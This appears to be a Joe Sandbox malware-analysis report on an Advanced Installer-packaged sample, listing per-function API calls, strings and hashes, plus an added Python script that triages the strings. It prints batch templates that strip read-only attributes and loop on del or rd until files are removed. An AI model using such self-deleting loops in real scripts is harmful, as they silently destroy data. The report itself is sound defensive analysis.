                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$HeapProcess
                                                    • String ID: |^[
                                                    • API String ID: 275895251-2049683584
                                                    • Opcode ID: 47b413aca231a17ee57272af5451cd21dd0c59466a5dda8c6e2b0ddacf44ef8e
                                                    • Instruction ID: 3090e753e35a60bb762103edafb744d7e24953e0b82fdee3f81b4f67a568523f
                                                    • Opcode Fuzzy Hash: 47b413aca231a17ee57272af5451cd21dd0c59466a5dda8c6e2b0ddacf44ef8e
                                                    • Instruction Fuzzy Hash: 976138B0500B44CFD711CF69C55879ABFF4BF09308F108A5ED4899B391D7B9A509DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00471EAE
                                                    • RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00471EF5
                                                    • RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00471F14
                                                    • RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00471F43
                                                    • RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00471FB8
                                                    • RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 00472032
                                                    • RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 00472084
                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00472118
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0047211F
                                                    • __Init_thread_footer.LIBCMT ref: 00472133
                                                    • GetCurrentProcess.KERNEL32(?), ref: 00472156
                                                    • IsWow64Process.KERNEL32(00000000), ref: 0047215D
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00472197
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$Process$AddressCloseCurrentHandleInit_thread_footerModuleOpenProcWow64
                                                    • String ID: (c$CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                                    • API String ID: 1906320730-1100393421
                                                    • Opcode ID: f6d10fc7e3bb4019cbf8257bb48dd55b994cc510941a80d883b76b79693dc2f5
                                                    • Instruction ID: 28f677cfcdc3df5255e797cc6ca1f06287f4d3a1e97b914834a9b6f16df9869a
                                                    • Opcode Fuzzy Hash: f6d10fc7e3bb4019cbf8257bb48dd55b994cc510941a80d883b76b79693dc2f5
                                                    • Instruction Fuzzy Hash: 4D9193B19013289EEB20CF54CD45FEABBB6FB54710F00419AE509A72D0EB765E94CF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 00472240
                                                    • RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?), ref: 0047227B
                                                    • RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 004722F6
                                                    • RegCloseKey.KERNEL32(00000000), ref: 004724CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
                                                    • API String ID: 1586453840-3149529848
                                                    • Opcode ID: 3f40bd2fd2b89543ae3dba9e297a48b50d370e93684682a76cdd39582ce70aaa
                                                    • Instruction ID: 5d58b2d5451f9824f7f907f1efbf80d054494edb5171326acc81209dabbd50d7
                                                    • Opcode Fuzzy Hash: 3f40bd2fd2b89543ae3dba9e297a48b50d370e93684682a76cdd39582ce70aaa
                                                    • Instruction Fuzzy Hash: E871A3307003199BEB209B61CE41BEF76A5FB50744F50947AD90EAB782EB7CCD458789
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00488094
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004880C8
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharInit_thread_footerMultiWide$FindHeapProcessResource
                                                    • String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$P\$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\$a[$nT$nT
                                                    • API String ID: 1419962739-2823011655
                                                    • Opcode ID: 9abd089a3f74ed7c30782580553803a0c4a7a6328320ba987971f8423af3c503
                                                    • Instruction ID: 554e5339f900940b9f607dbdc191248ed175de213addd899a495fea56b3c98e3
                                                    • Opcode Fuzzy Hash: 9abd089a3f74ed7c30782580553803a0c4a7a6328320ba987971f8423af3c503
                                                    • Instruction Fuzzy Hash: 445200709006099FDB11EB68CC05BAFBBB5BF41314F1486ADE915AB392DF389E04CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph
                                                     • Graph rendering not reproduced (legend: Executed / Not Executed). Basic blocks 454560-454a7b; calls on the paths: 35ab90, 456300, 35a850, 454a80, 46c960, 35a380, 454b90, 371a90, MoveFileW, 456470, GetModuleHandleW, 520372, GetProcAddress (three sites), 520328, 42a630, 455f60, 51fe6a, 52b6e4.
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • MoveFileW.KERNEL32(?,?), ref: 004546DA
                                                    • GetModuleHandleW.KERNEL32(kernel32,?), ref: 0045471C
                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00454764
                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 004547BC
                                                    • __Init_thread_footer.LIBCMT ref: 004547CC
                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00454814
                                                    • __Init_thread_footer.LIBCMT ref: 00454774
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    • __Init_thread_footer.LIBCMT ref: 00454824
                                                      • Part of subcall function 0042A630: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0042A671
                                                    Strings
                                                    • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 004545F0, 004545FF
                                                    • SetSearchPathMode, xrefs: 0045475E
                                                    • kernel32.dll, xrefs: 0045491F
                                                    • kernel32, xrefs: 00454717
                                                    • @;\, xrefs: 004548AF
                                                    • SetDllDirectory, xrefs: 004547B6
                                                    • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 004545D2
                                                    • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 004545F7
                                                    • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 004545D7, 004545DF
                                                    • SetDefaultDllDirectories, xrefs: 0045480E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$AddressProc$CriticalSection$ConditionDirectoryEnterFileHandleHeapLeaveModuleMoveProcessSystemVariableWake
                                                    • String ID: @;\$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
                                                    • API String ID: 3437638698-1024950946
                                                    • Opcode ID: 8e7938454c3a5a82ea2dd6ce0d1dd5260db861929bfeeaafe251c257837766e7
                                                    • Instruction ID: 25fae5783804d89e40d8829747c639af6f766d57323adccd1c8249a7b5c10b0c
                                                    • Opcode Fuzzy Hash: 8e7938454c3a5a82ea2dd6ce0d1dd5260db861929bfeeaafe251c257837766e7
                                                    • Instruction Fuzzy Hash: ABE17CB09002489FDB20DFA4C849BEEBFF4FF55318F10415DE815AB292DB759A48CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
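                                                     The function at 00454560 above does two things a triager should separate. It resolves SetSearchPathMode, SetDllDirectory and SetDefaultDllDirectories through GetProcAddress at runtime (the usual DLL search-order hardening an installer performs before loading libraries; the exports are looked up dynamically because older Windows builds lack them), and it carries batch-file templates that clear the read-only attribute and loop on del or rd until a file or directory is gone, two of them capped by a caller-supplied count with a five-second timeout between tries. Together with the neighbouring strings Software\Caphyon\Advanced Installer\, Advinst_Extract_ and AI_BOOTSTRAPPERLANGS, this is the Caphyon Advanced Installer bootstrapper's own cleanup and loader code, a packaging layer to keep distinct from the payload behaviour that the Yara and network signatures at the top of the report fired on.

                                                     The Python below is an added example, not part of the Joe Sandbox report or of any tool it references. It takes the Strings and APIs lines quoted above (copied into the script as constructed input) and runs that triage: each batch template is classified by what it removes, whether its retry loop is bounded and whether it sleeps between tries, and the GetProcAddress lines are scanned for the three search-path exports. The trait checks are plain substring heuristics chosen for these templates, not a general batch parser.

```python
import re

# Constructed input: the batch templates and API lines as they appear in the
# report's Strings/APIs lists for the function at 00454560 (raw strings so the
# backslashes and %% sequences are kept verbatim).
BATCH_TEMPLATES = [
    r'@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls',
    r'@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls',
    r'@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "',
    r'@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "',
]

API_LINES = [
    "GetModuleHandleW.KERNEL32(kernel32,?), ref: 0045471C",
    "GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00454764",
    "GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 004547BC",
    "GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00454814",
    "MoveFileW.KERNEL32(?,?), ref: 004546DA",
]

# kernel32 exports an installer resolves at runtime to restrict the DLL search
# path; they are fetched via GetProcAddress because older Windows lacks them.
SEARCH_PATH_APIS = {"SetSearchPathMode", "SetDllDirectory", "SetDefaultDllDirectories"}

# Matches the report's "GetProcAddress.<module>(<handle>,<export>)" rendering.
GETPROCADDR_RE = re.compile(r"GetProcAddress\.\w+\(\w+,(\w+)\)")


def resolved_search_path_apis(api_lines):
    """Return the set of search-path hardening exports resolved via GetProcAddress."""
    found = set()
    for line in api_lines:
        m = GETPROCADDR_RE.search(line)
        if m and m.group(1) in SEARCH_PATH_APIS:
            found.add(m.group(1))
    return found


def classify_cleanup_template(template):
    """Describe one attrib/del/rd batch template by its observable traits (heuristic)."""
    return {
        "clears_readonly": "attrib.exe -r" in template,
        "retry_loop": ":try" in template and "goto try" in template,
        # "GTR %lu": the caller formats a retry cap into the script, so the loop ends.
        "bounded": "GTR %lu" in template,
        "delay_between_tries": "timeout.exe" in template,
        # The loop body removes a directory with rd, otherwise a file with del.
        "removes": "directory" if 'rd "%s"' in template else "file",
    }


def triage(templates, api_lines):
    """Combine both checks into a list of one-line findings."""
    findings = []
    for t in templates:
        c = classify_cleanup_template(t)
        loop = "bounded" if c["bounded"] else "unbounded"
        delay = "with" if c["delay_between_tries"] else "no"
        findings.append(f"cleanup script: removes {c['removes']}, {loop} retry loop, {delay} delay")
    apis = resolved_search_path_apis(api_lines)
    missing = SEARCH_PATH_APIS - apis
    line = f"search-path hardening resolved at runtime: {sorted(apis)}"
    if missing:
        line += f" (not seen: {sorted(missing)})"
    findings.append(line)
    return findings


if __name__ == "__main__":
    for finding in triage(BATCH_TEMPLATES, API_LINES):
        print(finding)
```

                                                     Run against the four templates and five API lines above, the script reports two unbounded loops (plain del and rd with no delay), two bounded loops with a timeout between tries, and all three search-path exports resolved, which is what the raw listing above shows once read this way.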

                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 00487E50
                                                    • SetLastError.KERNEL32(0000000E), ref: 00487E6D
                                                    • GetCurrentThreadId.KERNEL32 ref: 00487E85
                                                    • EnterCriticalSection.KERNEL32(0063E7BC), ref: 00487EA2
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00487EC5
                                                    • DialogBoxParamW.USER32(000007D0,00000000,003C8D40,00000000), ref: 00487EE2
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00488094
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004880C8
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,?,?,006394D0,004A03D0,?), ref: 00456288
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 004562BA
                                                    • SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 00488299
                                                    • SetEvent.KERNEL32(?,00000000,?,?), ref: 0048834F
                                                      • Part of subcall function 00494550: DeleteFileW.KERNEL32(?,?,?,?,?,0048837F,?,?,?), ref: 0049457B
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$CriticalEventInit_thread_footerSection$ActiveCurrentDeleteDialogEnterErrorFileHeapLastLeaveParamProcessThreadWindow
                                                    • String ID: Advinst_Extract_$Code returned to Windows by setup:$FILES.7z$P^[
                                                    • API String ID: 2923632737-1804513603
                                                    • Opcode ID: 790795a8861eb4de3004d705462d08329c608fb87e85e08450fa1efe836e5b76
                                                    • Instruction ID: cf3bf21e6c9bcdaa7baca2104d670b5074b486d532957151a6fa1c434b5008da
                                                    • Opcode Fuzzy Hash: 790795a8861eb4de3004d705462d08329c608fb87e85e08450fa1efe836e5b76
                                                    • Instruction Fuzzy Hash: 5392B030900249DFDB11EBA8CC49BDEBBB4BF55314F14829EE405AB292DB789E44CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph
                                                     • Graph rendering not reproduced (legend: Executed / Not Executed). Basic blocks 495ed0-4960f6; calls on the paths: GetActiveWindow, 48e3f0, KiUserCallbackDispatcher, 51fa13, SetLastError, 51fb15, 368f60, 35a850, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, CreateDialogParamW, 371a90, 477070, 470180, 359bb0, SetWindowTextW, GetDlgItem, 35ab90, 35a140.
                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 00495F0A
                                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?), ref: 00495F47
                                                    • GetCurrentThreadId.KERNEL32 ref: 00495FD2
                                                    • SetWindowTextW.USER32(?,00000000), ref: 0049605C
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00496066
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00496072
                                                    • GetDlgItem.USER32(?,00000002), ref: 004960DF
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004960E7
                                                      • Part of subcall function 0048E3F0: GetDlgItem.USER32(?,00000002), ref: 0048E410
                                                      • Part of subcall function 0048E3F0: GetWindowRect.USER32(00000000,?), ref: 0048E426
                                                      • Part of subcall function 0048E3F0: ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,00495F2A,?,?,?,?,?,?), ref: 0048E43F
                                                      • Part of subcall function 0048E3F0: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00495F2A,?,?), ref: 0048E44A
                                                      • Part of subcall function 0048E3F0: GetDlgItem.USER32(00000000,000003E9), ref: 0048E45C
                                                      • Part of subcall function 0048E3F0: GetWindowRect.USER32(00000000,?), ref: 0048E472
                                                      • Part of subcall function 0048E3F0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,00495F2A), ref: 0048E4B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$RectText$ActiveCurrentErrorInvalidateLastShowThread
                                                    • String ID:
                                                    • API String ID: 127311041-0
                                                    • Opcode ID: 9d37f4982c34f02e11d510ed804c729b2e65c8d4c9f4a197b4c60d35c1df8733
                                                    • Instruction ID: 52e56b1b0961f8f49de86c8f1ecef87a1261ac8ef7aea2054c5fbe74cc18a494
                                                    • Opcode Fuzzy Hash: 9d37f4982c34f02e11d510ed804c729b2e65c8d4c9f4a197b4c60d35c1df8733
                                                    • Instruction Fuzzy Hash: A261D171500604EFDB21DF68CC48B5ABFB5FF04320F15826AE8159B2E1CB75A904CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph
                                                     • Graph rendering not reproduced (legend: Executed / Not Executed). Basic blocks 51f7a5-51f854; calls on the paths: RtlDecodePointer, LoadLibraryExA, 51f855 (four sites), DecodePointer.
                                                    APIs
                                                    • RtlDecodePointer.NTDLL(?,00000000,?,0051FB44,00637D7C,?,00000000,?,00495F5C,?,00000000,00000000,?,?), ref: 0051F7B7
                                                    • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,00000000,?,0051FB44,00637D7C,?,00000000,?,00495F5C,?,00000000,00000000), ref: 0051F7CC
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0051F848
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DecodePointer$LibraryLoad
                                                    • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                    • API String ID: 1423960858-1745123996
                                                    • Opcode ID: 5cdd812e770eaa124a951e6ce38444fa36df45be26c40818232b78ace18bfc32
                                                    • Instruction ID: a940d4cf0504d82a1caea0b61a68b51b01e933297d786e054111885252c91b19
                                                    • Opcode Fuzzy Hash: 5cdd812e770eaa124a951e6ce38444fa36df45be26c40818232b78ace18bfc32
                                                    • Instruction Fuzzy Hash: DC012670640612BBEB116B109C17FE93F957F42758F050078BC08BA2F2DBB19989D3D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph
                                                     • Graph rendering not reproduced (legend: Executed / Not Executed). Basic blocks 46cf10-46d1d5; calls on the paths: 46c960, PathIsUNCW, 46cb90, 35a850, CreateFileW, GetFileSize, CloseHandle, 35a380, 456ea0, 3711b0, CreateDirectoryW, GetLastError, 46aaa0, 46c5d0.
                                                    APIs
                                                    • PathIsUNCW.SHLWAPI(?,D13B3340,?,?,?), ref: 0046CF5B
                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,005C3B3C,00000001,?,?,?,?,?,0054842D,000000FF,?,8000000B), ref: 0046D01A
                                                    • GetLastError.KERNEL32(?,?,?,?,0054842D,000000FF,?,8000000B), ref: 0046D028
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
